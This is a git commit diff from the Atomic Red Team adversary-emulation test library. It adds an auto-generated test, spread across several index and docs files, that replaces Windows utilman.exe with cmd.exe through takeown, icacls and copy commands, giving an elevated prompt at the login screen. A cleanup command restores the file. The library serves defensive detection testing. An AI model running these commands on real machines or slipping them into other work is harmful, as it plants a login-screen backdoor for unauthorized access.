Generated docs from job=generate-docs branch=master [ci skip]

2025-03-20 00:48:28 +00:00
parent 6192857491
commit 098b33bfe2
12 changed files with 130 additions and 3 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1718-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1719-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -810,6 +810,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -1194,6 +1195,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replac
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -566,6 +566,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -827,6 +828,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replac
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1065,6 +1065,7 @@
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
  - Atomic Test #5: Auto-start application on user logon [windows]
+  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1605,6 +1606,7 @@
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
  - Atomic Test #5: Auto-start application on user logon [windows]
+  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -762,6 +762,7 @@
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
  - Atomic Test #5: Auto-start application on user logon [windows]
+  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1131,6 +1132,7 @@
  - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
  - Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
  - Atomic Test #5: Auto-start application on user logon [windows]
+  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -41367,6 +41367,26 @@ privilege-escalation:
          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
        name: command_prompt
        elevation_required: true
+    - name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
+      auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
+      description: 'Replace utilman.exe (Ease of Access binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt by clicking the Ease
+        of Access button on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\utilman.exe /A
+          icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      x_mitre_platforms:
@@ -65552,6 +65572,26 @@ persistence:
          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
        name: command_prompt
        elevation_required: true
+    - name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
+      auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
+      description: 'Replace utilman.exe (Ease of Access binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt by clicking the Ease
+        of Access button on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\utilman.exe /A
+          icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      modified: '2024-02-01T04:37:36.774Z'
@@ -34540,6 +34540,26 @@ privilege-escalation:
          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
        name: command_prompt
        elevation_required: true
+    - name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
+      auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
+      description: 'Replace utilman.exe (Ease of Access binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt by clicking the Ease
+        of Access button on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\utilman.exe /A
+          icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      x_mitre_platforms:
@@ -54511,6 +54531,26 @@ persistence:
          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
        name: command_prompt
        elevation_required: true
+    - name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
+      auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
+      description: 'Replace utilman.exe (Ease of Access binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt by clicking the Ease
+        of Access button on the login screen.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\utilman.exe /A
+          icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      modified: '2024-02-01T04:37:36.774Z'
@@ -32,6 +32,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi

 - [Atomic Test #5 - Auto-start application on user logon](#atomic-test-5---auto-start-application-on-user-logon)

+- [Atomic Test #6 - Replace utilman.exe (Ease of Access Binary) with cmd.exe](#atomic-test-6---replace-utilmanexe-ease-of-access-binary-with-cmdexe)
+

 <br/>

@@ -242,4 +244,39 @@ reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"



+<br/>
+<br/>
+
+## Atomic Test #6 - Replace utilman.exe (Ease of Access Binary) with cmd.exe
+Replace utilman.exe (Ease of Access binary) with cmd.exe. This allows the user to launch an elevated command prompt by clicking the Ease of Access button on the login screen.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1db380da-3422-481d-a3c8-6d5770dba580
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
+takeown /F C:\Windows\System32\utilman.exe /A
+icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
+```
+
+
+
+
+
 <br/>
@@ -122,6 +122,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true
 - name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
+  auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
  description: |
    Replace utilman.exe (Ease of Access binary) with cmd.exe. This allows the user to launch an elevated command prompt by clicking the Ease of Access button on the login screen.
  supported_platforms:
@@ -1743,3 +1743,4 @@ a4b74723-5cee-4300-91c3-5e34166909b4
 9f94a112-1ce2-464d-a63b-83c1f465f801
 b877943f-0377-44f4-8477-f79db7f07c4d
 228c336a-2f79-4043-8aef-bfa453a611d5
+1db380da-3422-481d-a3c8-6d5770dba580